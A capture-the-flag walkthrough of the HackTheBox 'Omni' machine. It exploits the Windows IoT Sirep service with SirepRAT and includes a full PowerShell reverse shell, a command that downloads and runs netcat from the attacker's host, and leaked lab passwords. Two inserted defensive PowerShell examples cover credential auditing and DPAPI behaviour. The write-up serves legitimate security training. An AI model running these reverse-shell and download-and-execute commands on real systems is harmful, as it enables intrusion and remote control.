Omni

Introduction:
Omni is probably named Omni because there is so much going on with this machine, as the initial scans show. The scans turn up a bunch of open ports and URLs that can lead you into rabbit holes. If you do good recon, you will realize that you are dealing with "Windows Device Portal", which appears to be an application/OS geared towards management and monitoring of IoT devices. Once you discover that, finding and exploiting the vulnerability is relatively easy.
Recon
Nmap scan
nmap -sS -sC -sV -T4 -O -oN nmap.omni.txt 10.10.10.204
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 15:31 EST
Nmap scan report for 10.10.10.204
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
Port scanner
(threader3000)
Enter your target IP address or URL here: 10.10.10.204
------------------------------------------------------------
Scanning target 10.10.10.204
Time started: 2021-01-03 15:31:32.631011
------------------------------------------------------------
Port 135 is open
Port 5985 is open
Port 8080 is open
Port 29820 is open
Port 29819 is open
Port 29817 is open
Port scan completed in 0:02:06.609975
Enumeration
Nikto scan for web
Port 8080
nikto -url http://10.10.10.204:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.204
+ Target Hostname: 10.10.10.204
+ Target Port: 8080
+ Start Time: 2021-01-03 15:32:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ Cookie CSRF-Token created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ / - Requires Authentication for realm 'Windows Device Portal'
+ Default account found for 'Windows Device Portal' at / (ID '', PW '00000000'). Konica/Minolta Di 2010f.
+ Root page / redirects to: /authorizationrequired.htm
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /exchange/: This may be interesting (Outlook exchange OWA server?)...
+ OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
+ /3rdparty/phpMyAdmin/: phpMyAdmin directory found
+ /3rdparty/phpmyadmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ /pma/: phpMyAdmin directory found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /jk-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /server-manager/: Mitel Audio and Web Conferencing server manager identified.
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ /jk-manager/status: Tomcat Server Status interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /host-manager/status: Tomcat Server Status interface found (pass protected)
+ /server-info: Apache server-info interface found (protected/forbidden)
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
+ /system/console/configMgr: Adobe Experience Manager OSGi console.
+ 7870 requests: 1 error(s) and 23 item(s) reported on remote host
+ End Time: 2021-01-03 15:35:36 (GMT-5) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Port 5985
nikto -output nikto.omni.txt -url http://omni.htb:5985
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.204
+ Target Hostname: omni.htb
+ Target Port: 5985
+ Start Time: 2021-01-03 19:19:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7786 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2021-01-03 19:24:37 (GMT-5) (285 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The login page is Windows Device Portal, which appears to be related to IoT.
I tried the default credentials Administrator/p@ssw0rd, but they did not work.
Exploitation
During my research, I came across this paper and an RCE exploitation script that exploit the Sirep service, which the Windows IoT platform uses to communicate over port 29820.

(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
---------

---------
---------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ file_contents=`cat /oscp/LABs/zerotrust/content/lab/hackthebox/omni/data/mini-reverse.ps1`
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ echo $file_contents
$socket = new-object System.Net.Sockets.TcpClient('10.10.14.25', 4455); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do { $writer.Flush(); $read = $null; $res = "" while($stream.DataAvailable -or $read -eq $null) { $read = $stream.Read($buffer, 0, 1024) } $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); if(!$out.equals("exit")){ $args = ""; if($out.IndexOf(' ') -gt -1){ $args = $out.substring($out.IndexOf(' ')+1); $out = $out.substring(0,$out.IndexOf(' ')); if($args.split(' ').length -gt 1){ $pinfo = New-Object System.Diagnostics.ProcessStartInfo $pinfo.FileName = "cmd.exe" $pinfo.RedirectStandardError = $true $pinfo.RedirectStandardOutput = $true $pinfo.UseShellExecute = $false $pinfo.Arguments = "/c $out $args" $p = New-Object System.Diagnostics.Process $p.StartInfo = $pinfo $p.Start() | Out-Null $p.WaitForExit() $stdout = $p.StandardOutput.ReadToEnd() $stderr = $p.StandardError.ReadToEnd() if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout } } else{ $res = (&"$out" "$args") | out-string; } } else{ $res = (&"$out") | out-string; } if($res -ne $null){ $writer.WriteLine($res) } } }While (!$out.equals("exit")) $writer.close(); $socket.close(); $stream.Dispose()

(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb PutFileOnDevice --remote_path "C:\Windows\temp\shell.ps1" --data="$file_contents"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb GetFileFromDevice --remote_path "C:\Windows\temp\shell.ps1" --v
---------

---------
---------
$socket = new-object System.Net.Sockets.TcpClient('10.10.14.25', 4455);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
            $writer.WriteLine($res)
        }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 13562, payload peek: 'b'$\x00s\x00o\x00c\x00k\x00e\x00t\x00 \x00=\x00 \x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00S\x00y\x00s\x00t\x00''>
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$
That didn't work and I encountered numerous issues, so I decided to switch to using nc.
Start a web server with Python and host nc.exe on it, then download and run it on the target machine. Make sure to start a local listener on your desired port (4455 in my case) to catch the incoming shell:
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -Outfile C:\Windows\temp\nc64.exe -URI http://10.10.14.25:8000/nc64.exe" --v
---------

---------
---------

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\temp\\nc64.exe 10.10.14.25 4455 -e powershell.exe" --v
---------

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$


get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force



PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement>
get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force

get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force



PS C:\Data> cd ..
cd ..
PS C:\> cd Windows
cd Windows
PS C:\Windows> cd temp
cd temp
PS C:\Windows\temp> dir
dir


 Directory: C:\Windows\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/4/2021 1:56 AM 45272 nc.exe
-a---- 1/4/2021 2:08 AM 45272 nc64.exe
-a---- 1/3/2021 11:53 PM 65536 shell.ps1


PS C:\Windows\temp> cp nc64.exe ../System32/
cp nc64.exe ../System32/
PS C:\Windows\temp>
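The r.bat found above is worth a second look from the defender's side: it resets the app and administrator passwords from strings hardcoded in the script on every loop iteration, so anyone who can read the file has both accounts. The PowerShell function below is an added example, not code from the writeup or from the Omni machine: it walks a drive the same way the get-childitem search above does, but additionally greps every batch and PowerShell script for the "net user NAME PASSWORD" pattern and for plaintext-to-SecureString conversions, so that scripts embedding credentials can be found and cleaned up. The function name, the extension list and the regular expressions are my own assumptions.

```powershell
# Added example (not part of the writeup): audit a drive for scripts that embed
# account credentials the way r.bat does ("net user app mesh5143").
function Find-EmbeddedCredentialScripts {
    param(
        [string]   $Root    = 'C:\',
        # Assumed set of script types worth checking on a Windows host
        [string[]] $Include = @('*.bat', '*.cmd', '*.ps1'),
        # Assumed patterns: "net user NAME PASSWORD [...]" (group 1 = account name)
        # and a SecureString built from a literal plaintext password
        [string[]] $Patterns = @(
            '(?i)\bnet\s+user\s+(\S+)\s+(\S+)',
            '(?i)ConvertTo-SecureString\s+.*-AsPlainText'
        )
    )

    # -Force includes hidden files; -ErrorAction SilentlyContinue skips paths
    # this account cannot read, mirroring the recursive search in the writeup.
    Get-ChildItem -Path $Root -Include $Include -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-String -Pattern $Patterns |
        ForEach-Object {
            $m = $_.Matches[0]
            [pscustomobject]@{
                Path    = $_.Path
                Line    = $_.LineNumber
                Match   = $_.Line.Trim()
                # Only the "net user" pattern has a capture group for the account name
                Account = if ($m.Groups.Count -gt 1) { $m.Groups[1].Value } else { $null }
            }
        }
}

# Usage: list every hit with the account it touches, e.g. r.bat would report
# "app" and "administrator" on its two "net user" lines.
Find-EmbeddedCredentialScripts -Root 'C:\' | Format-Table -AutoSize
```

The "net localgroup ... /delete" line in r.bat is deliberately not matched: the audit is after credentials, not group changes. A script that both resets passwords and removes administrators in an endless loop, as r.bat does, is also a good candidate for a scheduled-task or autorun review, since something has to launch it for the loop to matter.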
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.204] 49672
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> getuid
getuid
getuid : The term 'getuid' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or
if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ getuid
+ ~~~~~~
 + CategoryInfo : ObjectNotFound: (getuid:String) [], CommandNotFo
 undException
 + FullyQualifiedErrorId : CommandNotFoundException

PS C:\windows\system32> $env:username
$env:username
Administrator
PS C:\windows\system32> cd ../..
cd ../..
PS C:\> dir
dir


 Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/20/2020 2:36 AM $Reconfig$
d----l 10/26/2018 11:35 PM Data
d----- 10/26/2018 11:37 PM Program Files
d----- 10/26/2018 11:38 PM PROGRAMS
d----- 10/26/2018 11:37 PM SystemData
d-r--- 10/26/2018 11:37 PM Users
d----- 7/3/2020 10:35 PM Windows
Post-exploit/PrivEsc
PS C:\> cd Users
cd Users
PS C:\Users> dir
dir


 Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/26/2018 11:37 PM Public


PS C:\Users> cd Public
cd Public
PS C:\> cd Data
cd Data
PS C:\Data> dir
dir


 Directory: C:\Data


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/26/2018 11:37 PM CrashDump
d----- 10/26/2018 11:37 PM Logfiles
d----- 10/26/2018 11:37 PM Programs
d----- 7/3/2020 11:22 PM SharedData
d----- 7/3/2020 11:22 PM SystemData
d----- 10/26/2018 11:38 PM test
d----- 7/4/2020 7:28 PM Users
d----- 10/26/2018 11:38 PM Windows
-a---- 7/4/2020 12:22 AM 0 FirstBoot.Complete


PS C:\Data> cd SharedData
cd SharedData
PS C:\Data\SharedData> dir
dir


 Directory: C:\Data\SharedData


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/26/2018 11:38 PM DuShared
d----- 7/3/2020 11:24 PM input
d----- 7/3/2020 11:22 PM ServiceProfiles
Find the user flag
PS C:\Data\SharedData> get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force
get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force


 Directory: C:\Data\Users\app


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\Data\SharedData> cd C:\Data\Users\app
cd C:\Data\Users\app
PS C:\Data\Users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
 <Obj RefId="0">
 <TN RefId="0">
 <T>System.Management.Automation.PSCredential</T>
 <T>System.Object</T>
 </TN>
 <ToString>System.Management.Automation.PSCredential</ToString>
 <Props>
 <S N="UserName">flag</S>
 <SS N="Password">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</SS>
 </Props>
 </Obj>
</Objs>
PS C:\Data\Users\app> get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force
get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force


 Directory: C:\Data\Users\administrator


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/4/2020 9:48 PM 1958 root.txt


PS C:\Data\Users\app> cd C:\Data\Users\administrator
cd C:\Data\Users\administrator
PS C:\Data\Users\administrator> type root.txt
type root.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
 <Obj RefId="0">
 <TN RefId="0">
 <T>System.Management.Automation.PSCredential</T>
 <T>System.Object</T>
 </TN>
 <ToString>System.Management.Automation.PSCredential</ToString>
 <Props>
 <S N="UserName">flag</S>
 <SS N="Password">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</SS>
 </Props>
 </Obj>
</Objs>

PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
$credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt


PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbXXXXXXXXXXXXXXXXXX1d

PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:16
+ $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
 Exception
 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand



PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:15
+ $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
 Exception
 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

PS C:\Data\Users\administrator> cd C:\Data\Users\app\
cd C:\Data\Users\app\
PS C:\Data\Users\app> dir
dir


 Directory: C:\Data\Users\app


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt


PS C:\Data\Users\app> $credential = Import-CliXml user.txt
$credential = Import-CliXml user.txt
Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:15
+ $credential = Import-CliXml user.txt
+ ~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
 Exception
 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

PS C:\Data\Users\app> $env:UserName
$env:UserName
Administrator
PS C:\Data\Users\app> UserName^C
eneloop@kinetic:.../tools/ctftools/SirepRAT$ nc -lvnp 8000
listening on [any] 8000 ...


connect to [10.10.14.25] from (UNKNOWN) [10.10.10.204] 49673
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32>
PS C:\windows\system32>
PS C:\windows\system32> $env:UserName
$env:UserName
app
PS C:\windows\system32> $credential = Import-CliXml C:\Data\Users\app\user.txt
$credential = Import-CliXml C:\Data\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd70
PS C:\windows\system32>
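Both flag files are PSCredential objects written with Export-CliXml. The password inside is a SecureString, and on Windows Export-CliXml protects a SecureString with DPAPI in the CurrentUser scope, so the <SS> blob can only be decrypted by the account that exported it, on that machine. That is the reason Import-CliXml on C:\Data\Users\app\user.txt raises a CryptographicException in the Administrator shell but works once the shell runs as app, while root.txt opened fine as Administrator. The PowerShell below is an added example, not code from the writeup: it exports a constructed sample credential, reads the resulting CliXml without decrypting it, and wraps Import-CliXml so a DPAPI mismatch is reported as a result instead of a raw error. The function names, the sample secret and the demo-cred.xml path are my own assumptions.

```powershell
# Added example (not from the writeup): demonstrates why Import-CliXml fails
# with "Error occurred during a cryptographic operation" when a different
# Windows account tries to read an exported PSCredential.

function Export-DemoCredential {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $UserName  = 'flag',                          # same UserName as the flag files
        [string] $PlainText = 'constructed-sample-secret'      # constructed value, not a real flag
    )
    $secure = ConvertTo-SecureString -String $PlainText -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential($UserName, $secure)
    # On Windows the SecureString is serialised as a DPAPI (CurrentUser) blob in <SS N="Password">
    $cred | Export-Clixml -Path $Path
}

function Get-CliXmlSecretInfo {
    # Inspect the file structure without attempting to decrypt anything
    param([Parameter(Mandatory)] [string] $Path)
    [xml]$doc = Get-Content -Path $Path -Raw
    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('ps', 'http://schemas.microsoft.com/powershell/2004/04')
    $user = $doc.SelectSingleNode("//ps:S[@N='UserName']", $ns).InnerText
    $blob = $doc.SelectSingleNode("//ps:SS[@N='Password']", $ns).InnerText
    [pscustomobject]@{
        TypeName     = $doc.Objs.Obj.TN.T[0]     # System.Management.Automation.PSCredential
        UserName     = $user
        BlobHexChars = $blob.Length              # hex-encoded DPAPI blob; unreadable without the owner's key
    }
}

function Import-DemoCredential {
    param([Parameter(Mandatory)] [string] $Path)
    try {
        # -ErrorAction Stop turns the cmdlet error into a catchable exception
        $cred = Import-Clixml -Path $Path -ErrorAction Stop
        [pscustomobject]@{
            Status   = 'ok'
            Reader   = $env:USERNAME
            UserName = $cred.UserName
            Password = $cred.GetNetworkCredential().Password   # plaintext, as in the writeup
        }
    }
    catch [System.Security.Cryptography.CryptographicException] {
        # Same failure the writeup hits when Administrator reads app's user.txt:
        # the blob was protected under another user's DPAPI master key.
        [pscustomobject]@{
            Status   = 'dpapi-mismatch'
            Reader   = $env:USERNAME
            UserName = $null
            Password = $null
            Reason   = "blob not encrypted for $($env:USERNAME): $($_.Exception.Message)"
        }
    }
}

# Usage: run once as the exporting user (Status = ok), then run only
# Import-DemoCredential as a different local account (Status = dpapi-mismatch).
$demo = Join-Path $env:TEMP 'demo-cred.xml'
Export-DemoCredential -Path $demo
Get-CliXmlSecretInfo -Path $demo
Import-DemoCredential -Path $demo
```

This only holds on Windows PowerShell and PowerShell 7 on Windows; on Linux or macOS there is no DPAPI, so Export-Clixml cannot bind the SecureString to an account and the file should be treated as sensitive as a plaintext password. The practical takeaway from Omni is the mirror image: a CliXml credential is confidential only as far as the exporting account is, and any shell obtained as that account (here, app) reads it back with a single Import-CliXml call.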